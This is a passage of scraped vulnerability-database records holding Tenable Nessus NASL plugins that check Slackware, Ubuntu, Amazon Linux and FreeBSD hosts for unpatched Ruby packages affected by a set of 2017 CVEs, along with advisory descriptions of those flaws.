script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"ruby\", pkgver:\"2.2.8\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"2.2.8\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ruby\", pkgver:\"2.4.2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ruby\", pkgver:\"2.4.2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T10:52:49", "description": "It was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a denial of service. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to expose sensitive information.\n(CVE-2017-14064).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-06T00:00:00", "title": "Ubuntu 14.04 LTS : ruby1.9.1 vulnerabilities (USN-3439-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901", "CVE-2017-10748"], "modified": "2017-10-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1", "p-cpe:/a:canonical:ubuntu_linux:ruby1.9.3", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3439-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103692", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3439-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103692);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10748\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"USN\", value:\"3439-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : ruby1.9.1 vulnerabilities (USN-3439-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. An\nattacker could use this to cause a denial of service. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. An\nattacker could use this to expose sensitive information.\n(CVE-2017-14064).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3439-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libruby1.9.1, ruby1.9.1 and / or ruby1.9.3\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ruby1.9.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.1\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ruby1.9.3\", pkgver:\"1.9.3.484-2ubuntu1.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby1.9.1 / ruby1.9.1 / ruby1.9.3\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:21:41", "description": "Arbitrary heap exposure during a JSON.generate call\n\nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can\nexpose arbitrary memory during a JSON.generate call. The issues lies\nin using strdup in ext/json/ext/generator/generator.c, which will stop\nafter encountering a '\\\\0' byte, returning a pointer to a string of\nlength zero, which is not the length stored in space_len.\n(CVE-2017-14064)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to\ninject terminal emulator escape sequences into its log and possibly\nexecute arbitrary commands via a crafted user name. (CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause\na denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications to cause a denial of service attack against\nRubyGems clients who have issued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems version 2.6.12 and earlier fails to validate specification\nnames, allowing a maliciously crafted gem to potentially overwrite any\nfile on the filesystem. (CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking\nvulnerability that allows a MITM attacker to force the RubyGems client\nto download and install gems from a server that the attacker controls.\n(CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious\nformat string which contains a precious specifier (*) with a huge\nminus value. Such situation can lead to a buffer overrun, resulting in\na heap memory corruption or an information disclosure from the heap.\n(CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications that include terminal escape characters.\nPrinting the gem specification would execute terminal escape\nsequences. (CVE-2017-0899)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-10-27T00:00:00", "title": "Amazon Linux AMI : ruby24 (ALAS-2017-915)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:rubygem24-xmlrpc", "p-cpe:/a:amazon:linux:ruby24", "p-cpe:/a:amazon:linux:ruby24-doc", "p-cpe:/a:amazon:linux:ruby24-irb", "p-cpe:/a:amazon:linux:rubygem24-did_you_mean", "p-cpe:/a:amazon:linux:ruby24-debuginfo", "p-cpe:/a:amazon:linux:rubygem24-io-console", "p-cpe:/a:amazon:linux:ruby24-devel", "p-cpe:/a:amazon:linux:rubygems24", "p-cpe:/a:amazon:linux:rubygems24-devel", "p-cpe:/a:amazon:linux:rubygem24-psych", "p-cpe:/a:amazon:linux:rubygem24-bigdecimal", "p-cpe:/a:amazon:linux:rubygem24-json", "p-cpe:/a:amazon:linux:ruby24-libs", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-915.NASL", "href": "https://www.tenable.com/plugins/nessus/104181", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-915.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104181);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"ALAS\", value:\"2017-915\");\n\n script_name(english:\"Amazon Linux AMI : ruby24 (ALAS-2017-915)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Arbitrary heap exposure during a JSON.generate call\n\nRuby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can\nexpose arbitrary memory during a JSON.generate call. The issues lies\nin using strdup in ext/json/ext/generator/generator.c, which will stop\nafter encountering a '\\\\0' byte, returning a pointer to a string of\nlength zero, which is not the length stored in space_len.\n(CVE-2017-14064)\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nThe Basic authentication code in WEBrick library in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to\ninject terminal emulator escape sequences into its log and possibly\nexecute arbitrary commands via a crafted user name. (CVE-2017-10784)\n\nBuffer underrun in OpenSSL ASN1 decode\n\nThe decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8,\n2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause\na denial of service (interpreter crash) via a crafted string.\n(CVE-2017-14033)\n\nNo size limit in summary length of gem spec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications to cause a denial of service attack against\nRubyGems clients who have issued a `query` command. (CVE-2017-0900)\n\nArbitrary file overwrite due to incorrect validation of specification\nname\n\nRubyGems version 2.6.12 and earlier fails to validate specification\nnames, allowing a maliciously crafted gem to potentially overwrite any\nfile on the filesystem. (CVE-2017-0901)\n\nDNS hijacking vulnerability\n\nRubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking\nvulnerability that allows a MITM attacker to force the RubyGems client\nto download and install gems from a server that the attacker controls.\n(CVE-2017-0902)\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nRuby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious\nformat string which contains a precious specifier (*) with a huge\nminus value. Such situation can lead to a buffer overrun, resulting in\na heap memory corruption or an information disclosure from the heap.\n(CVE-2017-0898)\n\nEscape sequence in the 'summary' field of gemspec\n\nRubyGems version 2.6.12 and earlier is vulnerable to maliciously\ncrafted gem specifications that include terminal escape characters.\nPrinting the gem specification would execute terminal escape\nsequences. (CVE-2017-0899)\n\nA vulnerability was found where the rubygems module was vulnerable to\nan unsafe YAML deserialization when inspecting a gem. Applications\ninspecting gem files without installing them can be tricked to execute\narbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-915.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update ruby24' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ruby24-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-did_you_mean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygem24-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems24\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:rubygems24-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-debuginfo-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-devel-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-doc-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-irb-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby24-libs-2.4.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-bigdecimal-1.3.0-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-did_you_mean-1.1.0-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-io-console-0.4.6-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-json-2.0.4-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-psych-2.2.2-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem24-xmlrpc-0.2.1-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-2.6.13-1.30.4.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems24-devel-2.6.13-1.30.4.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby24 / ruby24-debuginfo / ruby24-devel / ruby24-doc / ruby24-irb / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:55:45", "description": "Ruby blog :\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\n\nIf a malicious format string which contains a precious specifier (*)\nis passed and a huge minus value is also passed to the specifier,\nbuffer underrun may be caused. In such situation, the result may\ncontains heap, or the Ruby interpreter may crash.\n\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nWhen using the Basic authentication of WEBrick, clients can pass an\narbitrary string as the user name. WEBrick outputs the passed user\nname intact to its log, then an attacker can inject malicious escape\nsequences to the log and dangerous control characters may be executed\non a victim's terminal emulator.\n\nThis vulnerability is similar to a vulnerability already fixed, but it\nhad not been fixed in the Basic authentication.\n\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\nbuffer underrun may be caused and the Ruby interpreter may crash.\n\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\n\nThe generate method of JSON module optionally accepts an instance of\nJSON::Ext::Generator::State class. If a malicious instance is passed,\nthe result may include contents of heap.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-20T00:00:00", "title": "FreeBSD : ruby -- multiple vulnerabilities (95b01379-9d52-11e7-a25c-471bafc3262f)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2017-09-20T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_95B013799D5211E7A25C471BAFC3262F.NASL", "href": "https://www.tenable.com/plugins/nessus/103345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103345);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n\n script_name(english:\"FreeBSD : ruby -- multiple vulnerabilities (95b01379-9d52-11e7-a25c-471bafc3262f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby blog :\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\n\nIf a malicious format string which contains a precious specifier (*)\nis passed and a huge minus value is also passed to the specifier,\nbuffer underrun may be caused. In such situation, the result may\ncontains heap, or the Ruby interpreter may crash.\n\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nWhen using the Basic authentication of WEBrick, clients can pass an\narbitrary string as the user name. WEBrick outputs the passed user\nname intact to its log, then an attacker can inject malicious escape\nsequences to the log and dangerous control characters may be executed\non a victim's terminal emulator.\n\nThis vulnerability is similar to a vulnerability already fixed, but it\nhad not been fixed in the Basic authentication.\n\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\nbuffer underrun may be caused and the Ruby interpreter may crash.\n\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\n\nThe generate method of JSON module optionally accepts an instance of\nJSON::Ext::Generator::State class. If a malicious instance is passed,\nthe result may include contents of heap.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ruby-lang.org/en/security/\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/sprintf-buffer-underrun-cve-2017-0898/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0909107e\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/webrick-basic-auth-escape-sequence-injection-cve-2017-10784/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90a3a566\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5429c6d6\"\n );\n # https://www.ruby-lang.org/en/news/2017/09/14/json-heap-exposure-cve-2017-14064/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d043841\"\n );\n # https://vuxml.freebsd.org/freebsd/95b01379-9d52-11e7-a25c-471bafc3262f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcd11fe5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 